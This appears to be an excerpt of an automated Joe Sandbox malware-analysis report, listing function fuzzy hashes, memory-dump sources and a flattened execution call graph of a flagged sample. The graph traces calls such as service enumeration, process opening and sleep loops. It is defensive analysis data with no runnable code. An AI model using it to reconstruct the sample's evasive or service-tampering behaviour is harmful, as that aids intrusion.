                                                    • Opcode ID: 2cc7b1bc6a23f312679c9d367e0955d6f0426dcdbd0a6389001a99ff106608db
                                                    • Instruction ID: 47d2afe0a30ce6f90da6ba7f2bbe60aaf9332a0e4a5a5ee09070b87eaca1e14b
                                                    • Opcode Fuzzy Hash: 2cc7b1bc6a23f312679c9d367e0955d6f0426dcdbd0a6389001a99ff106608db
                                                    • Instruction Fuzzy Hash: 4D419F31B002059FDB24DF28D55469EBBF6EFC8340F24492AE486E7369DB30AC86CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b31302e74ed97930f9fa73bfedebf77e3de7b54f0fb0586afed7afb8720a0341
                                                    • Instruction ID: a399b13b5ed0d89e73cf73eff88228b6a758d0e494cca45e7e5f1c43bb2a1cd0
                                                    • Opcode Fuzzy Hash: b31302e74ed97930f9fa73bfedebf77e3de7b54f0fb0586afed7afb8720a0341
                                                    • Instruction Fuzzy Hash: 22411874A002098FDB15DF59C444ADEBBF2BF89320F59819AE405BB365C774AD86CFA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7df1ef3ccece30c5b953d6b9f48e9e785b1bd8d1b621e92e262bea8dbab69ec8
                                                    • Instruction ID: aba924d3641f133532928f3ed2ff718a9dea9bcaafd636ef1e2c6c50d76b4ec1
                                                    • Opcode Fuzzy Hash: 7df1ef3ccece30c5b953d6b9f48e9e785b1bd8d1b621e92e262bea8dbab69ec8
                                                    • Instruction Fuzzy Hash: AF315B307003099FCB09A77DC99066F7BAAFFC5710F10486AE115A7369CA31EC42C790
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f2341d44c15a73cdec56c61e9533cc5e0f2dd3b36390deaf8615c6a0d4451555
                                                    • Instruction ID: 4584180ba9eee774ca009f33ccfd97e74cdac1d2715af443da2ca0b9e9c61c87
                                                    • Opcode Fuzzy Hash: f2341d44c15a73cdec56c61e9533cc5e0f2dd3b36390deaf8615c6a0d4451555
                                                    • Instruction Fuzzy Hash: 44313C35A00209CFDB15DF69C444ADDBBF2AF89320F18819AE445BB365C775AD86CFA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a8b892fc09fea9393ecf9aac7f7e3dc717026891020c80391abc00d66b4ca30
                                                    • Instruction ID: c379c852092525183bbaacb6ca1da3f903fb633263a1f6a6062d8e805378269e
                                                    • Opcode Fuzzy Hash: 9a8b892fc09fea9393ecf9aac7f7e3dc717026891020c80391abc00d66b4ca30
                                                    • Instruction Fuzzy Hash: 2B21D331E04209EFDB05EBB8D9805DEBFF6AF89700F1884A7E401A7229DB305D45CB61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 615fdda607f53a0d8998fa38ed7c78172e9bc77a59d6d5ca0098a84ca83c0b61
                                                    • Instruction ID: cde2e98b51524079c804acef6aff3bad86f9681fc327b70c696a801bfb2e522d
                                                    • Opcode Fuzzy Hash: 615fdda607f53a0d8998fa38ed7c78172e9bc77a59d6d5ca0098a84ca83c0b61
                                                    • Instruction Fuzzy Hash: 7A218031E04209EFCB05EBB8D9806DEBFF6AF89700F1885A7E401A7219CA356D45CB61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19e7dde0b605724f054a68d1ae5c939624862beca54f42346eec7fe354fdd62f
                                                    • Instruction ID: 6682bcf99e631c299536dd035a26223e2fa2830af02490bf700774fe558a87c3
                                                    • Opcode Fuzzy Hash: 19e7dde0b605724f054a68d1ae5c939624862beca54f42346eec7fe354fdd62f
                                                    • Instruction Fuzzy Hash: 6111E335B00318DFDF0467BD99143AFBAAEEB84B20F00443AE609D3398DA35C94587D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d67b28f9bb32039524b0b402f60cdb422911c8077c35197488aa34f065ac9d20
                                                    • Instruction ID: 87020862890beb2e08c659be858113e62b601b2fbe812ba44ce7a441825455c2
                                                    • Opcode Fuzzy Hash: d67b28f9bb32039524b0b402f60cdb422911c8077c35197488aa34f065ac9d20
                                                    • Instruction Fuzzy Hash: 15218C31A50208EFCB08EB69D554AAD7BF6EB8C700F20802AE501E7368CB75AC41CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin

                                                    Execution Graph

                                                    Execution Coverage:7.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:8.6%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:42
calls 21812->21818 21816 4072a4 15 API calls 21813->21816 21819 407450 15 API calls 21814->21819 22233 43a644 GetNativeSystemInfo 21815->22233 21820 443830 21816->21820 21821 44399d 21817->21821 21822 4438ab 21818->21822 21824 4439c8 21819->21824 21820->21792 21831 404564 17 API calls 21820->21831 21825 404cdc 14 API calls 21821->21825 21826 404cdc 14 API calls 21822->21826 21830 404cdc 14 API calls 21824->21830 21832 4439a2 21825->21832 21833 4438b0 21826->21833 21828 4439f6 21834 407450 15 API calls 21828->21834 21829 443a11 22235 43a7bc 21829->22235 21835 4439cd 21830->21835 21836 443843 21831->21836 21838 4042f8 14 API calls 21832->21838 21839 4042f8 14 API calls 21833->21839 21840 443a02 21834->21840 21841 4042f8 14 API calls 21835->21841 21842 4072a4 15 API calls 21836->21842 21849 443965 21838->21849 21844 4438b5 21839->21844 21845 404cdc 14 API calls 21840->21845 21846 4439d2 21841->21846 21847 443850 21842->21847 21843 443a16 21848 404564 17 API calls 21843->21848 21850 407450 15 API calls 21844->21850 21852 443a07 21845->21852 21853 407450 15 API calls 21846->21853 21847->21792 21858 404564 17 API calls 21847->21858 21854 443a23 21848->21854 21851 4438c1 21850->21851 21855 404cdc 14 API calls 21851->21855 21856 4042f8 14 API calls 21852->21856 21857 4439de 21853->21857 21859 4072a4 15 API calls 21854->21859 21860 4438c6 21855->21860 21856->21849 21861 404cdc 14 API calls 21857->21861 21862 443863 21858->21862 21863 443a30 21859->21863 21864 4042f8 14 API calls 21860->21864 21865 4439e3 21861->21865 21866 4072a4 15 API calls 21862->21866 21867 443cc4 21863->21867 21872 443a5f 21863->21872 21873 407450 15 API calls 21863->21873 21868 4438cb 21864->21868 21870 4042f8 14 API calls 21865->21870 21871 443870 21866->21871 21869 404564 17 API calls 21867->21869 21874 407450 15 API calls 21868->21874 21875 443cd1 21869->21875 21870->21849 21871->21782 21871->21792 21876 407450 15 API calls 21872->21876 21877 443a4b 21873->21877 21878 4438d7 21874->21878 21879 
4072a4 15 API calls 21875->21879 21880 443a6b 21876->21880 21881 404cdc 14 API calls 21877->21881 21882 404cdc 14 API calls 21878->21882 21883 443cde 21879->21883 21884 404cdc 14 API calls 21880->21884 21885 443a50 21881->21885 21886 4438dc 21882->21886 21887 443e6b 21883->21887 21892 443d0d 21883->21892 21898 407450 15 API calls 21883->21898 21888 443a70 21884->21888 21890 4042f8 14 API calls 21885->21890 21891 4042f8 14 API calls 21886->21891 21889 404564 17 API calls 21887->21889 21893 4042f8 14 API calls 21888->21893 21894 443e78 21889->21894 21896 443a55 21890->21896 21897 4438e1 21891->21897 21895 407450 15 API calls 21892->21895 21899 443a75 21893->21899 21900 4072a4 15 API calls 21894->21900 21901 443d19 21895->21901 22942 40632c 10 API calls 21896->22942 21903 407450 15 API calls 21897->21903 21904 443cf9 21898->21904 21905 407450 15 API calls 21899->21905 21906 443e85 21900->21906 21907 404cdc 14 API calls 21901->21907 21908 4438ed 21903->21908 21909 404cdc 14 API calls 21904->21909 21910 443a81 21905->21910 21912 443ecb 21906->21912 21918 443eb0 21906->21918 21919 443e90 21906->21919 21913 443d1e 21907->21913 21914 404cdc 14 API calls 21908->21914 21915 443cfe 21909->21915 21911 404cdc 14 API calls 21910->21911 21917 443a86 21911->21917 21921 404564 17 API calls 21912->21921 21920 4042f8 14 API calls 21913->21920 21922 4438f2 21914->21922 21916 4042f8 14 API calls 21915->21916 21923 443d03 21916->21923 21925 4042f8 14 API calls 21917->21925 21924 407450 15 API calls 21918->21924 21926 407450 15 API calls 21919->21926 21927 443d23 21920->21927 21928 443ed8 21921->21928 21929 4042f8 14 API calls 21922->21929 22944 40632c 10 API calls 21923->22944 21932 443ebc 21924->21932 21933 443a8b 21925->21933 21934 443e9c 21926->21934 21935 443d31 21927->21935 21936 443d2c 21927->21936 21937 4072a4 15 API calls 21928->21937 21930 4438f7 21929->21930 21938 407450 15 API calls 21930->21938 21939 404cdc 14 API calls 21932->21939 21940 407450 15 API calls 21933->21940 
21941 404cdc 14 API calls 21934->21941 21944 43b7d4 52 API calls 21935->21944 21942 43a688 18 API calls 21936->21942 21943 443ee5 21937->21943 21945 443903 21938->21945 21946 443ec1 21939->21946 21947 443a97 21940->21947 21948 443ea1 21941->21948 21942->21935 21943->21849 21949 443eeb 21943->21949 21950 443d36 21944->21950 21951 404cdc 14 API calls 21945->21951 21952 4042f8 14 API calls 21946->21952 21953 404cdc 14 API calls 21947->21953 21954 4042f8 14 API calls 21948->21954 21955 407450 15 API calls 21949->21955 21956 407450 15 API calls 21950->21956 21958 443908 21951->21958 21959 443ec6 21952->21959 21960 443a9c 21953->21960 21961 443ea6 21954->21961 21962 443ef7 21955->21962 21957 443d42 21956->21957 21964 404cdc 14 API calls 21957->21964 21965 4042f8 14 API calls 21958->21965 22949 43f7a4 129 API calls 21959->22949 21967 4042f8 14 API calls 21960->21967 22948 40632c 10 API calls 21961->22948 21963 404cdc 14 API calls 21962->21963 21969 443efc 21963->21969 21970 443d47 21964->21970 21971 44390d 21965->21971 21972 443aa1 21967->21972 21973 4042f8 14 API calls 21969->21973 21974 4042f8 14 API calls 21970->21974 21975 407450 15 API calls 21971->21975 21976 407450 15 API calls 21972->21976 21977 443f01 21973->21977 21978 443d4c 21974->21978 21979 443919 21975->21979 21980 443aad 21976->21980 21981 43b7d4 52 API calls 21977->21981 22945 43c9b4 77 API calls 21978->22945 21983 404cdc 14 API calls 21979->21983 21984 404cdc 14 API calls 21980->21984 21985 443f06 21981->21985 21987 44391e 21983->21987 21988 443ab2 21984->21988 21989 407450 15 API calls 21985->21989 21986 443d51 21990 407450 15 API calls 21986->21990 21991 4042f8 14 API calls 21987->21991 21992 4042f8 14 API calls 21988->21992 21993 443f12 21989->21993 21994 443d5d 21990->21994 21995 443923 21991->21995 21996 443ab7 21992->21996 21998 404cdc 14 API calls 21993->21998 21999 404cdc 14 API calls 21994->21999 22000 407450 15 API calls 21995->22000 21997 407450 15 API calls 21996->21997 22001 443ac3 
21997->22001 22002 443f17 21998->22002 22003 443d62 21999->22003 22004 44392f 22000->22004 22005 404cdc 14 API calls 22001->22005 22006 4042f8 14 API calls 22002->22006 22007 4042f8 14 API calls 22003->22007 22008 404cdc 14 API calls 22004->22008 22010 443ac8 22005->22010 22011 443f1c 22006->22011 22012 443d67 22007->22012 22009 443934 22008->22009 22013 4042f8 14 API calls 22009->22013 22014 4042f8 14 API calls 22010->22014 22015 43bf00 23 API calls 22011->22015 22016 43bf00 23 API calls 22012->22016 22017 443939 22013->22017 22018 443acd 22014->22018 22019 443f26 22015->22019 22020 443d71 22016->22020 22021 407450 15 API calls 22017->22021 22022 407450 15 API calls 22018->22022 22023 43c1c8 21 API calls 22019->22023 22024 43c1c8 21 API calls 22020->22024 22026 443945 22021->22026 22027 443ad9 22022->22027 22028 443f30 Sleep 22023->22028 22025 443d7b Sleep 22024->22025 22029 407450 15 API calls 22025->22029 22030 404cdc 14 API calls 22026->22030 22031 404cdc 14 API calls 22027->22031 22051 443f44 22028->22051 22032 443d91 22029->22032 22033 44394a 22030->22033 22034 443ade 22031->22034 22036 404cdc 14 API calls 22032->22036 22037 4042f8 14 API calls 22033->22037 22038 4042f8 14 API calls 22034->22038 22035 443f6d Sleep 22041 43b58c 27 API calls 22035->22041 22039 443d96 22036->22039 22040 44394f 22037->22040 22042 443ae3 22038->22042 22043 4042f8 14 API calls 22039->22043 22044 407450 15 API calls 22040->22044 22045 443f81 22041->22045 22046 407450 15 API calls 22042->22046 22047 443d9b 22043->22047 22048 44395b 22044->22048 22049 407450 15 API calls 22045->22049 22050 443aef 22046->22050 22946 43d938 24 API calls 22047->22946 22053 404cdc 14 API calls 22048->22053 22054 443f8d 22049->22054 22055 404cdc 14 API calls 22050->22055 22051->22035 22056 43b58c 27 API calls 22051->22056 22057 443960 22053->22057 22058 404cdc 14 API calls 22054->22058 22059 443af4 22055->22059 22056->22051 22061 4042f8 14 API calls 22057->22061 22062 443f92 22058->22062 22060 4042f8 14 
API calls 22059->22060 22064 443af9 22060->22064 22061->21849 22063 4042f8 14 API calls 22062->22063 22063->21849 22065 404564 17 API calls 22064->22065 22067 443b06 22065->22067 22066 443dd3 Sleep 22068 43b58c 27 API calls 22066->22068 22069 4072a4 15 API calls 22067->22069 22070 443de7 Sleep 22068->22070 22071 443b13 22069->22071 22072 404564 17 API calls 22070->22072 22074 443b15 22071->22074 22075 443b26 22071->22075 22076 443dfe 22072->22076 22073 443da0 22073->22066 22077 43b58c 27 API calls 22073->22077 22078 406bf0 15 API calls 22074->22078 22080 406bf0 15 API calls 22075->22080 22079 4072a4 15 API calls 22076->22079 22077->22073 22081 443b24 22078->22081 22082 443e0b 22079->22082 22080->22081 22084 443b43 22081->22084 22329 43a688 GetModuleHandleW 22081->22329 22083 443e47 22082->22083 22086 407450 15 API calls 22082->22086 22085 443e55 22083->22085 22947 43a724 18 API calls 22083->22947 22334 43de78 22084->22334 22092 407450 15 API calls 22085->22092 22091 443e19 22086->22091 22089 443b48 22433 43b7d4 22089->22433 22094 404cdc 14 API calls 22091->22094 22095 443e61 22092->22095 22097 443e1e 22094->22097 22098 404cdc 14 API calls 22095->22098 22101 4042f8 14 API calls 22097->22101 22099 443e66 22098->22099 22102 4042f8 14 API calls 22099->22102 22100 407450 15 API calls 22103 443b59 22100->22103 22104 443e23 22101->22104 22102->21887 22106 404cdc 14 API calls 22103->22106 22105 43e864 85 API calls 22104->22105 22107 443e2a 22105->22107 22108 443b5e 22106->22108 22109 407450 15 API calls 22107->22109 22110 4042f8 14 API calls 22108->22110 22111 443e36 22109->22111 22112 443b63 22110->22112 22113 404cdc 14 API calls 22111->22113 22114 404564 17 API calls 22112->22114 22115 443e3b 22113->22115 22116 443b70 22114->22116 22117 4042f8 14 API calls 22115->22117 22118 4072a4 15 API calls 22116->22118 22119 443e40 22117->22119 22120 443b7d 22118->22120 22121 43f310 21 API calls 22119->22121 22122 443b99 22120->22122 22123 404564 17 API calls 22120->22123 
22121->22083 22502 43d0f8 22122->22502 22125 443b8c 22123->22125 22126 4072a4 15 API calls 22125->22126 22126->22122 22127 443bab 22128 407450 15 API calls 22127->22128 22129 443bb7 22128->22129 22130 404cdc 14 API calls 22129->22130 22131 443bbc 22130->22131 22132 4042f8 14 API calls 22131->22132 22133 443bc1 22132->22133 22652 43c598 22133->22652 22135 443bc6 22136 407450 15 API calls 22135->22136 22137 443bd2 22136->22137 22138 404cdc 14 API calls 22137->22138 22139 443bd7 22138->22139 22140 4042f8 14 API calls 22139->22140 22141 443bdc 22140->22141 22685 43e7dc 22141->22685 22144 407450 15 API calls 22145 443bed 22144->22145 22146 404cdc 14 API calls 22145->22146 22147 443bf2 22146->22147 22148 4042f8 14 API calls 22147->22148 22149 443bf7 22148->22149 22694 43bf00 22149->22694 22151 443c01 22731 43c1c8 OpenProcess 22151->22731 22153 443c0b Sleep 22158 443c1f 22153->22158 22154 443c48 Sleep 22758 43b58c 22154->22758 22156 443c5c Sleep 22157 407450 15 API calls 22156->22157 22159 443c72 22157->22159 22158->22154 22160 43b58c 27 API calls 22158->22160 22161 404cdc 14 API calls 22159->22161 22160->22158 22162 443c77 22161->22162 22163 4042f8 14 API calls 22162->22163 22164 443c7c 22163->22164 22786 43e864 22164->22786 22166 443c83 22167 407450 15 API calls 22166->22167 22168 443c8f 22167->22168 22169 404cdc 14 API calls 22168->22169 22170 443c94 22169->22170 22171 4042f8 14 API calls 22170->22171 22172 443c99 22171->22172 22931 43f310 22172->22931 22174 443ca0 22175 407450 15 API calls 22174->22175 22176 443cac 22175->22176 22177 404cdc 14 API calls 22176->22177 22178 443cb1 22177->22178 22179 4042f8 14 API calls 22178->22179 22180 443cb6 22179->22180 22180->21867 22181 443cbf 22180->22181 22943 43a724 18 API calls 22181->22943 22184 40a2eb 22183->22184 22950 405f98 22184->22950 22187 407450 22188 407473 22187->22188 22995 406824 22188->22995 22193 404cdc 22194 404d02 22193->22194 22195 404ce7 22193->22195 22197 404be8 14 API calls 22194->22197 22196 404be8 14 API 
calls 22195->22196 22198 404cfe 22196->22198 22197->22198 23038 404930 22198->23038 22201 4042f8 23048 40a264 14 API calls 22201->23048 22203 40430c 22203->21761 22204 4042a0 22204->22203 22205 4042c5 22204->22205 23046 40a264 14 API calls 22204->23046 23047 404294 10 API calls 22205->23047 22208 4042e6 22208->21761 23049 404448 22209->23049 22211 404448 15 API calls 22212 404528 22211->22212 22212->22211 22213 40453f 22212->22213 22213->21781 22215 406bf0 15 API calls 22214->22215 22216 40457a 22215->22216 22217 40459c GetCommandLineW 22216->22217 22218 40457e GetModuleFileNameW 22216->22218 22223 4045a3 22217->22223 23053 406d2c 22218->23053 22221 404448 15 API calls 22221->22223 22222 4045ba 22224 4072a4 22222->22224 22223->22221 22223->22222 22225 4072a8 22224->22225 22228 4072b8 22224->22228 22225->22228 23058 406d1c 15 API calls 22225->23058 22227 4072f2 22229 4072a4 15 API calls 22227->22229 22228->21790 22230 4072fb 22229->22230 23059 4041cc 14 API calls 22230->23059 22232 407306 22232->21790 22234 43a657 22233->22234 22234->21828 22234->21829 22236 43a7e1 22235->22236 22237 43a7f6 22235->22237 23121 4387ec 18 API calls 22236->23121 23122 4387a8 18 API calls 22237->23122 22240 43a7f2 23060 438890 22240->23060 22244 43a81c 22245 43a863 22244->22245 22248 43a827 GetLastError 22244->22248 23093 439408 22245->23093 22250 407450 15 API calls 22248->22250 22252 43a843 22250->22252 23123 407dec 22252->23123 22256 407450 15 API calls 22257 43a852 22256->22257 22260 404cdc 14 API calls 22257->22260 22258 43a906 22262 438b0c 20 API calls 22258->22262 22259 43a884 22259->22258 22263 40e50c 15 API calls 22259->22263 22261 43a857 22260->22261 22264 4042f8 14 API calls 22261->22264 22265 43a912 22262->22265 22270 43a8a0 22263->22270 22266 43a85c 22264->22266 22267 43a959 22265->22267 22272 43a91d GetLastError 22265->22272 23127 40632c 10 API calls 22266->23127 22269 439408 71 API calls 22267->22269 22271 43a968 22269->22271 22270->22258 22277 407450 15 API calls 
22270->22277 22273 406bf0 15 API calls 22271->22273 22274 407450 15 API calls 22272->22274 22275 43a975 22273->22275 22276 43a939 22274->22276 22278 438860 17 API calls 22275->22278 22279 407dec 14 API calls 22276->22279 22280 43a8c7 22277->22280 22281 43a97c 22278->22281 22282 43a93e 22279->22282 22284 404cdc 14 API calls 22280->22284 22285 40e50c 15 API calls 22281->22285 22283 407450 15 API calls 22282->22283 22286 43a948 22283->22286 22287 43a8cc 22284->22287 22293 43a989 22285->22293 22288 404cdc 14 API calls 22286->22288 22289 4042f8 14 API calls 22287->22289 22290 43a94d 22288->22290 22291 43a8d1 22289->22291 22294 4042f8 14 API calls 22290->22294 22295 407450 15 API calls 22291->22295 22292 43aa10 22301 40e50c 15 API calls 22292->22301 22293->22292 22296 40e50c 15 API calls 22293->22296 22297 43a952 22294->22297 22298 43a8e0 22295->22298 22305 43a9a7 22296->22305 23129 40632c 10 API calls 22297->23129 22300 407450 15 API calls 22298->22300 22302 43a8e8 22300->22302 22307 43aa24 22301->22307 22303 407450 15 API calls 22302->22303 22304 43a8f2 22303->22304 22306 404cdc 14 API calls 22304->22306 22305->22292 22310 407450 15 API calls 22305->22310 22308 43a8f7 22306->22308 22307->21843 22309 4042f8 14 API calls 22308->22309 22311 43a8fc 22309->22311 22312 43a9ce 22310->22312 23128 40632c 10 API calls 22311->23128 22314 404cdc 14 API calls 22312->22314 22315 43a9d3 22314->22315 22316 4042f8 14 API calls 22315->22316 22317 43a9d8 22316->22317 22318 407450 15 API calls 22317->22318 22319 43a9e7 22318->22319 22320 407450 15 API calls 22319->22320 22321 43a9f2 22320->22321 22322 407450 15 API calls 22321->22322 22323 43a9fc 22322->22323 22324 404cdc 14 API calls 22323->22324 22325 43aa01 22324->22325 22326 4042f8 14 API calls 22325->22326 22327 43aa06 22326->22327 23130 40632c 10 API calls 22327->23130 22330 43a6bf 22329->22330 22331 43a69e 22329->22331 22330->22084 23172 40aa94 17 API calls 22331->23172 22333 43a6a9 22333->22330 23173 43c45c 22334->23173 22336 
43deae 23183 43dc64 22336->23183 22341 407450 15 API calls 22342 43df08 22341->22342 22343 407450 15 API calls 22342->22343 22344 43df10 22343->22344 22345 404cdc 14 API calls 22344->22345 22346 43df15 22345->22346 22347 4042f8 14 API calls 22346->22347 22348 43df1a 22347->22348 22349 43dfaa 22348->22349 22350 43df2b 22348->22350 22351 43dfb7 22349->22351 22367 43e004 22349->22367 22353 43df7f 22350->22353 22355 407450 15 API calls 22350->22355 22354 43dfd9 22351->22354 22356 407450 15 API calls 22351->22356 22352 43e060 22357 43cea4 73 API calls 22352->22357 22359 407450 15 API calls 22353->22359 22365 43dfa5 22353->22365 22363 407450 15 API calls 22354->22363 22354->22365 22358 43df43 22355->22358 22360 43dfcf 22356->22360 22361 43e07c 22357->22361 22362 404cdc 14 API calls 22358->22362 22364 43df9b 22359->22364 22366 404cdc 14 API calls 22360->22366 23193 407184 15 API calls 22361->23193 22369 43df48 22362->22369 22370 43dff5 22363->22370 22371 404cdc 14 API calls 22364->22371 22365->22089 22372 43dfd4 22366->22372 22367->22352 22373 407450 15 API calls 22367->22373 22374 4042f8 14 API calls 22369->22374 22375 404cdc 14 API calls 22370->22375 22376 43dfa0 22371->22376 22377 4042f8 14 API calls 22372->22377 22378 43e03d 22373->22378 22379 43df4d 22374->22379 22380 43dffa 22375->22380 22381 4042f8 14 API calls 22376->22381 22377->22354 22382 404cdc 14 API calls 22378->22382 22383 407450 15 API calls 22379->22383 22384 4042f8 14 API calls 22380->22384 22381->22365 22385 43e042 22382->22385 22387 43df5c 22383->22387 22384->22365 22388 4042f8 14 API calls 22385->22388 22391 404cdc 14 API calls 22387->22391 22393 43e047 22388->22393 22396 43df61 22391->22396 22399 407450 15 API calls 22393->22399 22400 4042f8 14 API calls 22396->22400 22405 43e056 22399->22405 22401 43df66 22400->22401 22406 407450 15 API calls 22401->22406 22410 404cdc 14 API calls 22405->22410 22411 43df75 22406->22411 22415 43e05b 22410->22415 22416 404cdc 14 API calls 22411->22416 22420 4042f8 14 
API calls 22415->22420 22421 43df7a 22416->22421 22420->22352 22425 4042f8 14 API calls 22421->22425 22425->22353 22438 43b7dc 22433->22438 22434 43b7f8 OpenSCManagerW 22435 43b80c GetLastError 22434->22435 22434->22438 22437 407450 15 API calls 22435->22437 22437->22438 22438->22434 22439 404cdc 14 API calls 22438->22439 22440 43b893 EnumServicesStatusExW 22438->22440 22442 43b99e CloseServiceHandle 22438->22442 22446 407dec 14 API calls 22438->22446 22447 43ba9f 22438->22447 22448 407450 15 API calls 22438->22448 22455 43b58c 27 API calls 22438->22455 22458 40e50c 15 API calls 22438->22458 22461 4042f8 14 API calls 22438->22461 22463 40632c 10 API calls 22438->22463 22465 4072a4 15 API calls 22438->22465 23217 408334 22438->23217 23220 43b1a8 22438->23220 22439->22438 22441 43b8af GetLastError 22440->22441 22440->22442 22443 43b8be CloseServiceHandle 22441->22443 22450 43b8fe 22441->22450 22442->22438 22445 407450 15 API calls 22443->22445 22444 408334 20 API calls 22444->22450 22445->22438 22446->22438 22449 407450 15 API calls 22447->22449 22448->22438 22452 43bab7 22449->22452 22450->22444 22454 43b944 EnumServicesStatusExW 22450->22454 22453 407dec 14 API calls 22452->22453 22456 43babc 22453->22456 22454->22442 22457 43b95c CloseServiceHandle GetLastError 22454->22457 22455->22438 22459 407450 15 API calls 22456->22459 22462 407450 15 API calls 22457->22462 22458->22438 22460 43bac6 22459->22460 22464 404cdc 14 API calls 22460->22464 22461->22438 22475 43b97e 22462->22475 22463->22438 22466 43bacb 22464->22466 22465->22438 22468 4042f8 14 API calls 22466->22468 22467 407dec 14 API calls 22467->22475 22469 43bad0 22468->22469 22471 408334 20 API calls 22469->22471 22470 407450 15 API calls 22470->22475 22496 43bae7 22471->22496 22472 404cdc 14 API calls 22472->22475 22473 4042f8 14 API calls 22473->22475 22474 43bb80 22476 406bf0 15 API calls 22474->22476 22475->22467 22475->22470 22475->22472 22475->22473 23274 40632c 10 API calls 22475->23274 22488 43bb8c 
22476->22488 22478 43bbe4 22479 43bc13 22478->22479 22480 43bbed 22478->22480 22482 407450 15 API calls 22479->22482 22483 407450 15 API calls 22480->22483 22481 4072a4 15 API calls 22481->22496 22485 43bc22 22482->22485 22487 43bbfc 22483->22487 22484 406bf0 15 API calls 22484->22488 22489 404cdc 14 API calls 22485->22489 22490 407450 15 API calls 22487->22490 22488->22478 22488->22484 23275 407184 15 API calls 22488->23275 22491 43bc27 22489->22491 22492 43bc07 22490->22492 22494 4042f8 14 API calls 22491->22494 22495 404cdc 14 API calls 22492->22495 22493 408334 20 API calls 22493->22496 22499 43bc11 22494->22499 22497 43bc0c 22495->22497 22496->22474 22496->22481 22496->22493 22498 4042f8 14 API calls 22497->22498 22498->22499 23268 408340 22499->23268 22503 43d100 22502->22503 22503->22503 22504 43c45c 17 API calls 22503->22504 22505 43d124 22504->22505 23331 40f9d8 22505->23331 22510 43c45c 17 API calls 22514 43d14c 22510->22514 22511 43d2c1 22513 43d36a 22511->22513 22516 404564 17 API calls 22511->22516 22512 43d208 22515 407450 15 API calls 22512->22515 22518 406c44 14 API calls 22513->22518 22517 40f9d8 15 API calls 22514->22517 22519 43d217 22515->22519 22521 43d2d8 22516->22521 22522 43d157 22517->22522 22523 43d3af 22518->22523 22520 404cdc 14 API calls 22519->22520 22525 43d21c 22520->22525 22526 40f9d8 15 API calls 22521->22526 23340 40f7e8 22522->23340 22524 406c44 14 API calls 22523->22524 22528 43d3b9 22524->22528 22529 4042f8 14 API calls 22525->22529 22530 43d2e3 22526->22530 22532 43d3d1 22528->22532 22533 43d3c4 22528->22533 22534 43d221 22529->22534 23364 4070a0 22530->23364 22531 43d15f 22536 43d163 22531->22536 22537 43d1a0 22531->22537 22538 43c45c 17 API calls 22532->22538 22542 43c45c 17 API calls 22533->22542 22606 43d3cc 22533->22606 23414 43cf60 21 API calls 22534->23414 22541 43c45c 17 API calls 22536->22541 22539 407450 15 API calls 22537->22539 22543 43d3de 22538->22543 22544 43d1af 22539->22544 22540 43d2f3 23385 40f77c 
